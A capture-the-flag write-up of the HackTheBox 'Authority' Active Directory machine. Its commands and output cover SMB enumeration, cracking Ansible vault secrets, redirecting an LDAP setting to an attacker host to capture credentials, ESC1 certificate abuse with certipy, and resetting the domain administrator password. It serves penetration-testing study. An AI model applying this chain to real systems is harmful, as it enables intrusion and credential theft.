Authority
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 10.129.9.12
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 10:01 +08
Warning: 10.129.9.12 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.9.12
Host is up (0.17s latency).
Not shown: 65501 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
8443/tcp open https-alt
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49686/tcp open unknown
49687/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49707/tcp open unknown
49710/tcp open unknown
60905/tcp open unknown
64054/tcp open unknownThis looks like an AD machine. Did a detailed scan to fully enumerate everything.
$ sudo nmap -p 53,80,88,135,139,389,445,8443 -sC -sV --min-rate 3000 10.129.9.12
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 10:03 +08
Nmap scan report for 10.129.9.12
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-17 06:03:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
|_ssl-date: 2023-07-17T06:04:13+00:00; +4h00m00s from scanner time.
445/tcp open microsoft-ds?
8443/tcp open ssl/https-altWe can add all the domain names into our /etc/hosts file.
SMB Shares -> Ansible Creds
SMB allowed access to a few shares with no credentials:
$ smbmap -u 'guest' -p '' -H 10.129.9.12
[+] IP: 10.129.9.12:445 Name: 10.129.9.12
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Department Shares NO ACCESS
Development READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server shareThere were quite a few items within the Development share, such as Ansible files nad stuff like that. Within the /Automation/Ansible/PWM/templates folder, we can find Tomcat creds:
$ cat tomcat-users.xml.j2
<?xml version='1.0' encoding='cp1252'?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<user username="admin" password="T0mc@tAdm1n" roles="manager-gui"/>
<user username="robot" password="T0mc@tR00t" roles="manager-script"/>
</tomcat-users>Within the ansible_inventory file of PWM, we can find some credentials for Ansible:
$ cat ansible_inventory
ansible_user: administrator
ansible_password: Welcome1
ansible_port: 5985
ansible_connection: winrm
ansible_winrm_transport: ntlm
ansible_winrm_server_cert_validation: ignoreThis suggests using WinRM, and I do know it is possible to execute commands using Ansible's WinRM module. Within the default directory, there's a main.yml file with some hashes:
$ cat main.yml
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"
pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true
pwm_require_ssl: false
pwm_admin_login: !vault |
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
pwm_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764We can try to crack these hashes using using ansible-vault decrypt and john. However, each vault has its own password that we need to crack. I read the source code to find the format required for this, including the newlines:
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438Then, we can run john to crack this:
$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 128/128 AVX 4x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&* (tojohn.yml)
1g 0:00:00:13 DONE (2023-07-17 10:38) 0.07220g/s 2874p/s 2874c/s 2874C/s 001983..victor2
Use the "--show" option to display all of the cracked passwords reliably
Session completed.This would give us the output:
$ cat tojohn.yml| ansible-vault decrypt
Vault password:
Decryption successful
svc_pwm We can repeat the process for the rest of the hashes. This would find two more credentials:
pWm_@dm!N_!23 (for login)
DevT3st@123 (for ldap)Web Enumeration -> Responder
Port 80 just shows an IIS Server. Port 8443 uses TLS and redirects me a login at /pwm/private/login:
We have the credentials for this, so let's try to edit the configurations. WIthin the LDAP config, we can change the LDAP URL:
This looks vulnerable to some hash capturing via responder. I replaced the LDAP URL with ldap://10.10.14.9:389 and then clicked on 'Test LDAP Profile', and responder captured a hash:
With this, we can evil-winrm in to the machine:
Privilege Escalation
ESC1 + Add Computer -> Reset DA Password
Within the machine, there are some certificates available:
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> ls cert:/Localmachine/My
PSParentPath: Microsoft.PowerShell.Security\Certificate::Localmachine\My
Thumbprint Subject
---------- -------
790DCBD9D91E34EDE37CDAD9C114C3DE1BEBA7BE CN=authority.authority.htb
42A80DC79DD9CE76D032080B2F8B172BC29B0182 CN=AUTHORITY-CA, DC=authority, DC=htbThis sort of guided me towards exploiting vulnerable certificate templates. I used certipy to find the CA stuff.
$ certipy find -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.129.9.12
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Saved BloodHound data to '20230717105005_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230717105005_Certipy.txt'
[*] Saved JSON output to '20230717105005_Certipy.json'Then, I looked through the certificates to see if there were any vulnerabilities. There was one vulnerability that it picked up on:
1
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
AutoEnrollmentCheckUserDsCertificate
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Document Signing
IP security IKE intermediate
IP security use
KDC Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 20 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AUTHORITY.HTB\Domain Computers
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Object Control Permissions
Owner : AUTHORITY.HTB\Administrator
Write Owner Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Dacl Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Property Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authenticationThe svc_ldap user can add new computers (most of the time Domain Users can do this), thus allowing us to request for the certificate needed.
First, add the new computer:
$ addcomputer.py -dc-ip 10.129.9.12 -computer-pass 'Password@123' -computer-name Evil 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' -computer-group 'CN=Domain Computers, DC=authority,DC=Authority,DC=htb'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Successfully added machine account Evil$ with password Password@123.Then, use this to request for the template.
$ certipy req -u 'Evil$' -p 'Password@123' -dc-ip 10.129.9.12 -ca AUTHORITY-CA -template CorpVPN -upn Administrator -debug
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.9.12[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.9.12[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'We are unable to request for a TGT using this certificate however.
$ certipy auth -pfx 'administrator.pfx' -username administrator -domain authority.htb -dc-ip 10.129.9.12
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)This means that Rubeus would fail as well. In this case, let's try to Pass the Certificate to reset the administrator's password.
First, generate the key and cert files:
$ certipy cert -pfx administrator.pfx -nocert -out admin.key
$ certipy cert -pfx administrator.pfx -nokey -out admin.crtThen, reset the administrator password:
$ python3 passthecert.py -action modify_user -crt admin.crt -key admin.key -domain authority.htb -dc-ip 10.129.8.242 -target administrator -new-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Successfully changed administrator password to: R08Fv3VKaSyyI1tJ1FYi1mAEGklJvWFy
Rooted!
Last updated